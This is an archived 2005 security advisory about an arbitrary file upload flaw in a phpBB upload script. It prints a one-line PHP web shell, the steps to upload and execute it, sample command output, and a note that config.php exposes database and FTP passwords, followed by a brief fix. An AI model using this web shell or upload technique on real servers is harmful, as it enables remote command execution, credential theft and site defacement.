phpBBupload.txt

2005-04-17T00:00:00
ID PACKETSTORM:37080
Type packetstorm
Reporter Status-x
Modified 2005-04-17T00:00:00

Description

                                        
                                            `#####################################################################  
  
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"  
  
$ Author: Status-x  
$ Contact: phr4xz@gmail.com - status-x@hackersoft.net  
$ Date: 7 April 2005  
$ Website: http://defacers.com.mx  
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt  
$ Risk: High  
$ Vendor URL: http://phpbb.com  
  
$ Affected Software: phpBB 2.0.x  
  
Note: Sorry if it has been posted before  
  
#####################################################################  
  
-= Description =-  
  
phpBB its a forums system written in php which can support images, polls,  
  
private messages and more  
  
http://www.phpbb.com  
  
---------------------------------------------------------------------------  
  
-= Vulnerabilities =-  
  
  
- | "Arbitrary File Upload" |  
  
  
In phpBB forums there is an script which can allow to remote and registered  
  
users to upload files with arbitrary content and with any extension.  
  
I didnt found any website where i can download the script so i couldnt  
  
check who made it.  
  
  
  
- | Examples: |  
  
  
We can create and example code to upload it to the "test site"  
  
  
<?  
  
system($cmd)  
  
?>  
  
  
And save it as cmd.php. The we enter to:  
  
--------------------------  
  
http://target/phpbb/up.php  
  
--------------------------  
  
  
And upload our code, to see our file we just enter to:  
  
-----------------------------------  
  
http://targey/phpbb/uploads/cmd.php  
  
-----------------------------------  
  
  
And we could see that our file has been uploaded:  
  
  
  
Warning: system(): Cannot execute a blank command in   
/home/target/public_html/forum/uploads/tetx.php on line 2  
  
  
The we can execute *NIX commands to obtain extremely compromising info  
  
that could end with the "deface" of the affected site:  
  
-----------------------------------------------------  
  
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP  
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux  
/home/target/public_html/forum/uploads  
uid=32029(target) gid=530(target) groups=530(target)   
  
------------------------------------------------------  
  
This is just an example to what can be done by a malicious attacker.  
  
  
- | "Password Disclosure" |  
  
  
The remote or local attacker can also read the config.php file disclosing  
  
the information about the DB and possible the FTP password  
  
  
------------------------------------------------------  
  
Example  
  
-= How to FIX =-  
  
Just filter the allowed extensions of the uploaded files in the up.php  
  
source.  
  
  
-= Contact =-  
  
Status-x   
  
phr4xz@gmail.com  
  
http://www.defacers.com.mx  
`